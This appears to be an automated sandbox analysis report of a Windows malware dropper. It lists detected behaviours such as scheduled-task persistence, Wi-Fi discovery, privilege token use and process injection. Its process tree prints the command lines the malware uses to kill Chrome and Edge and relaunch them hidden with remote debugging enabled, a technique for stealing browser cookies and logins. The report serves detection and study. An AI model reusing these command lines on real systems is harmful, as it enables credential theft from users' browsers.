pid Process 2644 PING.EXE 1924 PING.EXE 1924 PING.EXE 3008 PING.EXE 1272 PING.EXE 2792 PING.EXE 2044 PING.EXE 2652 PING.EXE 3448 PING.EXE 796 PING.EXE 2300 PING.EXE 3660 PING.EXE 4224 PING.EXE 4756 PING.EXE 1520 PING.EXE 1196 PING.EXE 4568 PING.EXE 3100 PING.EXE 1548 PING.EXE 1912 PING.EXE 2628 PING.EXE 2964 PING.EXE 1588 PING.EXE 1856 PING.EXE 4436 PING.EXE 4560 PING.EXE 3476 PING.EXE 1720 PING.EXE 764 PING.EXE 4316 PING.EXE 4892 PING.EXE 1028 PING.EXE 3164 PING.EXE 3600 PING.EXE 3304 PING.EXE 3788 PING.EXE 4748 PING.EXE 1476 PING.EXE 3568 PING.EXE 2528 PING.EXE 3808 PING.EXE 3292 PING.EXE 200 PING.EXE 3592 PING.EXE 3668 PING.EXE 3968 PING.EXE 1816 PING.EXE 2140 PING.EXE 1476 PING.EXE 2188 PING.EXE 2464 PING.EXE 2320 PING.EXE 956 PING.EXE 2524 PING.EXE 4288 PING.EXE 2456 PING.EXE 4768 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 664 cmd.exe 1812 netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4904 WMIC.exe 2912 WMIC.exe 3900 WMIC.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
pid Process 2044 systeminfo.exe 1932 systeminfo.exe -
Kills process with taskkill 4 IoCs
pid Process 3124 taskkill.exe 3780 taskkill.exe 1908 taskkill.exe 3216 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4018527317-446799424-2810249686-1000\{3AE489DE-475B-4EBC-8B7E-B1648B686EF7} msedge.exe Key created \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings ApiUpdater.exe -
Modifies registry key 1 TTPs 3 IoCs
pid Process 1756 reg.exe 2672 reg.exe 4468 reg.exe -
Runs ping.exe 1 TTPs 57 IoCs
pid Process 796 PING.EXE 3476 PING.EXE 3164 PING.EXE 956 PING.EXE 2524 PING.EXE 1856 PING.EXE 200 PING.EXE 3304 PING.EXE 4892 PING.EXE 4560 PING.EXE 3100 PING.EXE 1588 PING.EXE 1548 PING.EXE 2792 PING.EXE 4748 PING.EXE 2044 PING.EXE 3600 PING.EXE 2464 PING.EXE 2188 PING.EXE 3660 PING.EXE 3968 PING.EXE 4316 PING.EXE 3448 PING.EXE 3292 PING.EXE 1720 PING.EXE 2628 PING.EXE 4436 PING.EXE 1196 PING.EXE 4288 PING.EXE 1924 PING.EXE 4568 PING.EXE 1028 PING.EXE 1912 PING.EXE 1476 PING.EXE 3668 PING.EXE 4756 PING.EXE 2644 PING.EXE 1520 PING.EXE 3808 PING.EXE 3592 PING.EXE 4224 PING.EXE 3008 PING.EXE 2652 PING.EXE 1924 PING.EXE 2528 PING.EXE 3568 PING.EXE 4768 PING.EXE 2320 PING.EXE 2456 PING.EXE 2964 PING.EXE 3788 PING.EXE 1816 PING.EXE 2140 PING.EXE 1476 PING.EXE 2300 PING.EXE 1272 PING.EXE 764 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 61 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4036 schtasks.exe 1188 schtasks.exe 2204 schtasks.exe 2732 schtasks.exe 2300 schtasks.exe 864 schtasks.exe 3792 schtasks.exe 3584 schtasks.exe 4040 schtasks.exe 3660 schtasks.exe 2268 schtasks.exe 2260 schtasks.exe 4004 schtasks.exe 724 schtasks.exe 4276 schtasks.exe 4672 schtasks.exe 1936 schtasks.exe 1880 schtasks.exe 2468 schtasks.exe 1036 schtasks.exe 4832 schtasks.exe 4484 schtasks.exe 2460 schtasks.exe 2372 schtasks.exe 3048 schtasks.exe 3968 schtasks.exe 3316 schtasks.exe 656 schtasks.exe 4756 schtasks.exe 236 schtasks.exe 784 schtasks.exe 1448 schtasks.exe 980 schtasks.exe 1044 schtasks.exe 2140 schtasks.exe 1500 schtasks.exe 4392 schtasks.exe 1924 schtasks.exe 1636 schtasks.exe 5028 schtasks.exe 4004 schtasks.exe 4936 schtasks.exe 4380 schtasks.exe 1492 schtasks.exe 2824 schtasks.exe 1904 schtasks.exe 4752 schtasks.exe 4508 schtasks.exe 1640 schtasks.exe 2860 schtasks.exe 2528 schtasks.exe 1136 schtasks.exe 4196 schtasks.exe 3440 schtasks.exe 1408 schtasks.exe 2004 schtasks.exe 3504 schtasks.exe 872 schtasks.exe 1700 schtasks.exe 3504 schtasks.exe 2724 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2100 chrome.exe 2100 chrome.exe 1420 msedge.exe 1420 msedge.exe 2144 msedge.exe 2144 msedge.exe 4500 msedge.exe 4500 msedge.exe 836 msedge.exe 4732 msedge.exe 836 msedge.exe 4732 msedge.exe 4280 msedge.exe 4280 msedge.exe 4584 msedge.exe 4584 msedge.exe 3988 msedge.exe 3988 msedge.exe 4476 msedge.exe 4476 msedge.exe 4164 msedge.exe 4164 msedge.exe 1028 identity_helper.exe 1028 identity_helper.exe 3812 powershell.exe 3812 powershell.exe 4788 powershell.exe 4788 powershell.exe 3984 powershell.exe 3984 powershell.exe 4632 powershell.exe 4632 powershell.exe 1468 XClient.exe 2136 Autoupdate.exe 2136 Autoupdate.exe 3792 powershell.exe 2560 powershell.exe 3792 powershell.exe 2560 powershell.exe 4932 powershell.exe 4932 powershell.exe 3904 powershell.exe 3904 powershell.exe 3904 powershell.exe 4932 powershell.exe 3852 powershell.exe 3852 powershell.exe 1140 powershell.exe 1140 powershell.exe 4188 powershell.exe 5024 powershell.exe 4188 powershell.exe 4188 powershell.exe 5024 powershell.exe 5024 powershell.exe 2908 powershell.exe 2908 powershell.exe 4732 powershell.exe 4732 powershell.exe 4732 powershell.exe 4732 powershell.exe 3584 powershell.exe 3584 powershell.exe 3584 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 952 $77-Bitdefender.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2216 4363463463464363463463463.exe Token: SeDebugPrivilege 3124 taskkill.exe Token: SeShutdownPrivilege 2100 chrome.exe Token: SeCreatePagefilePrivilege 2100 chrome.exe Token: SeShutdownPrivilege 2100 chrome.exe Token: SeCreatePagefilePrivilege 2100 chrome.exe Token: SeShutdownPrivilege 2100 chrome.exe Token: SeCreatePagefilePrivilege 2100 chrome.exe Token: SeShutdownPrivilege 2100 chrome.exe Token: SeCreatePagefilePrivilege 2100 chrome.exe Token: SeDebugPrivilege 3780 taskkill.exe Token: SeDebugPrivilege 1468 XClient.exe Token: SeDebugPrivilege 1556 RunTimeBroker%20(2).exe Token: SeDebugPrivilege 3812 powershell.exe Token: SeDebugPrivilege 4788 powershell.exe Token: SeDebugPrivilege 3984 powershell.exe Token: SeDebugPrivilege 4632 powershell.exe Token: SeDebugPrivilege 1468 XClient.exe Token: SeDebugPrivilege 2144 Client-built.exe Token: SeDebugPrivilege 4780 WindowsDefender.exe Token: SeDebugPrivilege 2756 WindowsDefender.exe Token: SeDebugPrivilege 2136 Autoupdate.exe Token: SeDebugPrivilege 2880 svhoste.exe Token: SeDebugPrivilege 1812 svhoste.exe Token: SeDebugPrivilege 4416 WindowsDefender.exe Token: SeDebugPrivilege 2348 svhoste.exe Token: SeDebugPrivilege 2480 svhoste.exe Token: SeDebugPrivilege 3792 powershell.exe Token: SeDebugPrivilege 2560 powershell.exe Token: SeDebugPrivilege 948 tasklist.exe Token: SeDebugPrivilege 2888 tasklist.exe Token: SeDebugPrivilege 4524 tasklist.exe Token: SeIncreaseQuotaPrivilege 3392 WMIC.exe Token: SeSecurityPrivilege 3392 WMIC.exe Token: SeTakeOwnershipPrivilege 3392 WMIC.exe Token: SeLoadDriverPrivilege 3392 WMIC.exe Token: SeSystemProfilePrivilege 3392 WMIC.exe Token: SeSystemtimePrivilege 3392 WMIC.exe Token: SeProfSingleProcessPrivilege 3392 WMIC.exe Token: SeIncBasePriorityPrivilege 3392 WMIC.exe Token: SeCreatePagefilePrivilege 3392 WMIC.exe Token: SeBackupPrivilege 3392 WMIC.exe Token: SeRestorePrivilege 3392 WMIC.exe Token: SeShutdownPrivilege 3392 WMIC.exe Token: SeDebugPrivilege 3392 WMIC.exe Token: SeSystemEnvironmentPrivilege 3392 WMIC.exe Token: SeRemoteShutdownPrivilege 3392 WMIC.exe Token: SeUndockPrivilege 3392 WMIC.exe Token: SeManageVolumePrivilege 3392 WMIC.exe Token: 33 3392 WMIC.exe Token: 34 3392 WMIC.exe Token: 35 3392 WMIC.exe Token: 36 3392 WMIC.exe Token: SeDebugPrivilege 4932 powershell.exe Token: SeDebugPrivilege 3904 powershell.exe Token: SeIncreaseQuotaPrivilege 3392 WMIC.exe Token: SeSecurityPrivilege 3392 WMIC.exe Token: SeTakeOwnershipPrivilege 3392 WMIC.exe Token: SeLoadDriverPrivilege 3392 WMIC.exe Token: SeSystemProfilePrivilege 3392 WMIC.exe Token: SeSystemtimePrivilege 3392 WMIC.exe Token: SeProfSingleProcessPrivilege 3392 WMIC.exe Token: SeIncBasePriorityPrivilege 3392 WMIC.exe Token: SeCreatePagefilePrivilege 3392 WMIC.exe -
Suspicious use of FindShellTrayWindow 29 IoCs
pid Process 2100 chrome.exe 2100 chrome.exe 4280 msedge.exe 2144 Client-built.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe -
Suspicious use of SendNotifyMessage 13 IoCs
pid Process 2144 Client-built.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe -
Suspicious use of SetWindowsHookEx 45 IoCs
pid Process 1468 XClient.exe 2144 Client-built.exe 1812 svhoste.exe 2348 svhoste.exe 2480 svhoste.exe 2464 svhoste.exe 4568 svhoste.exe 2080 svhoste.exe 3352 svhoste.exe 728 svhoste.exe 1564 svhoste.exe 1500 svhoste.exe 4192 svhoste.exe 1960 svhoste.exe 2980 svhoste.exe 4084 svhoste.exe 3748 svhoste.exe 4464 svhoste.exe 1156 svhoste.exe 2548 svhoste.exe 5004 svhoste.exe 4564 svhoste.exe 4500 svhoste.exe 3040 svhoste.exe 4460 svhoste.exe 5016 svhoste.exe 3660 svhoste.exe 2788 svhoste.exe 3420 svhoste.exe 980 svhoste.exe 1380 svhoste.exe 3848 svhoste.exe 2092 svhoste.exe 4920 seksiak.exe 1236 svhoste.exe 3816 svhoste.exe 784 ewm.exe 784 ewm.exe 3660 svhoste.exe 668 svhoste.exe 3856 svhoste.exe 1212 svhoste.exe 3308 svhoste.exe 1624 svhoste.exe 2356 svhoste.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2216 wrote to memory of 1072 2216 4363463463464363463463463.exe 78 PID 2216 wrote to memory of 1072 2216 4363463463464363463463463.exe 78 PID 1072 wrote to memory of 2820 1072 main1.exe 79 PID 1072 wrote to memory of 2820 1072 main1.exe 79 PID 2820 wrote to memory of 3124 2820 main1.exe 80 PID 2820 wrote to memory of 3124 2820 main1.exe 80 PID 2820 wrote to memory of 2100 2820 main1.exe 83 PID 2820 wrote to memory of 2100 2820 main1.exe 83 PID 2100 wrote to memory of 784 2100 chrome.exe 84 PID 2100 wrote to memory of 784 2100 chrome.exe 84 PID 2100 wrote to memory of 3440 2100 chrome.exe 85 PID 2100 wrote to memory of 3440 2100 chrome.exe 85 PID 2100 wrote to memory of 1124 2100 chrome.exe 86 PID 2100 wrote to memory of 1124 2100 chrome.exe 86 PID 2100 wrote to memory of 4856 2100 chrome.exe 87 PID 2100 wrote to memory of 4856 2100 chrome.exe 87 PID 2100 wrote to memory of 4308 2100 chrome.exe 88 PID 2100 wrote to memory of 4308 2100 chrome.exe 88 PID 2100 wrote to memory of 3560 2100 chrome.exe 89 PID 2100 wrote to memory of 3560 2100 chrome.exe 89 PID 2100 wrote to memory of 2056 2100 chrome.exe 91 PID 2100 wrote to memory of 2056 2100 chrome.exe 91 PID 2820 wrote to memory of 3780 2820 main1.exe 92 PID 2820 wrote to memory of 3780 2820 main1.exe 92 PID 2820 wrote to memory of 4280 2820 main1.exe 94 PID 2820 wrote to memory of 4280 2820 main1.exe 94 PID 4280 wrote to memory of 4224 4280 msedge.exe 95 PID 4280 wrote to memory of 4224 4280 msedge.exe 95 PID 4280 wrote to memory of 2144 4280 msedge.exe 96 PID 4280 wrote to memory of 2144 4280 msedge.exe 96 PID 4280 wrote to memory of 1420 4280 msedge.exe 97 PID 4280 wrote to memory of 1420 4280 msedge.exe 97 PID 4280 wrote to memory of 4500 4280 msedge.exe 98 PID 4280 wrote to memory of 4500 4280 msedge.exe 98 PID 4280 wrote to memory of 836 4280 msedge.exe 100 PID 4280 wrote to memory of 836 4280 msedge.exe 100 PID 4280 wrote to memory of 4732 4280 msedge.exe 101 PID 4280 wrote to memory of 4732 4280 msedge.exe 101 PID 4280 wrote to memory of 3988 4280 msedge.exe 102 PID 4280 wrote to memory of 3988 4280 msedge.exe 102 PID 4280 wrote to memory of 4584 4280 msedge.exe 103 PID 4280 wrote to memory of 4584 4280 msedge.exe 103 PID 4280 wrote to memory of 4164 4280 msedge.exe 104 PID 4280 wrote to memory of 4164 4280 msedge.exe 104 PID 4280 wrote to memory of 4476 4280 msedge.exe 105 PID 4280 wrote to memory of 4476 4280 msedge.exe 105 PID 4280 wrote to memory of 1028 4280 msedge.exe 106 PID 4280 wrote to memory of 1028 4280 msedge.exe 106 PID 4280 wrote to memory of 1028 4280 msedge.exe 106 PID 2216 wrote to memory of 1468 2216 4363463463464363463463463.exe 107 PID 2216 wrote to memory of 1468 2216 4363463463464363463463463.exe 107 PID 2216 wrote to memory of 1556 2216 4363463463464363463463463.exe 108 PID 2216 wrote to memory of 1556 2216 4363463463464363463463463.exe 108 PID 1468 wrote to memory of 3812 1468 XClient.exe 109 PID 1468 wrote to memory of 3812 1468 XClient.exe 109 PID 1468 wrote to memory of 4788 1468 XClient.exe 111 PID 1468 wrote to memory of 4788 1468 XClient.exe 111 PID 1468 wrote to memory of 3984 1468 XClient.exe 113 PID 1468 wrote to memory of 3984 1468 XClient.exe 113 PID 1468 wrote to memory of 4632 1468 XClient.exe 115 PID 1468 wrote to memory of 4632 1468 XClient.exe 115 PID 1468 wrote to memory of 4004 1468 XClient.exe 117 PID 1468 wrote to memory of 4004 1468 XClient.exe 117 PID 2216 wrote to memory of 2144 2216 4363463463464363463463463.exe 119 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 6 IoCs
pid Process 2532 attrib.exe 4752 attrib.exe 4188 attrib.exe 2480 attrib.exe 3548 attrib.exe 4020 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"1⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Users\Admin\AppData\Local\Temp\Files\main1.exe"C:\Users\Admin\AppData\Local\Temp\Files\main1.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Users\Admin\AppData\Local\Temp\Files\main1.exe"C:\Users\Admin\AppData\Local\Temp\Files\main1.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM chrome.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox4⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffde320cc40,0x7ffde320cc4c,0x7ffde320cc585⤵PID:784
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1788,i,1948818967110350683,4325332516091205673,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1784 /prefetch:25⤵PID:3440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --no-appcompat-clear --field-trial-handle=1804,i,1948818967110350683,4325332516091205673,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1884 /prefetch:35⤵PID:1124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=1960,i,1948818967110350683,4325332516091205673,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2148 /prefetch:85⤵PID:4856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2824,i,1948818967110350683,4325332516091205673,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2856 /prefetch:15⤵
- Uses browser remote debugging
PID:4308
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2832,i,1948818967110350683,4325332516091205673,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2868 /prefetch:15⤵
- Uses browser remote debugging
PID:3560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3928,i,1948818967110350683,4325332516091205673,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3920 /prefetch:15⤵
- Uses browser remote debugging
PID:2056
-
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM msedge.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffddfb33cb8,0x7ffddfb33cc8,0x7ffddfb33cd85⤵PID:4224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1856,11617871939886455477,965936101383774506,131072 --no-sandbox --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1876 /prefetch:25⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2144
-
-
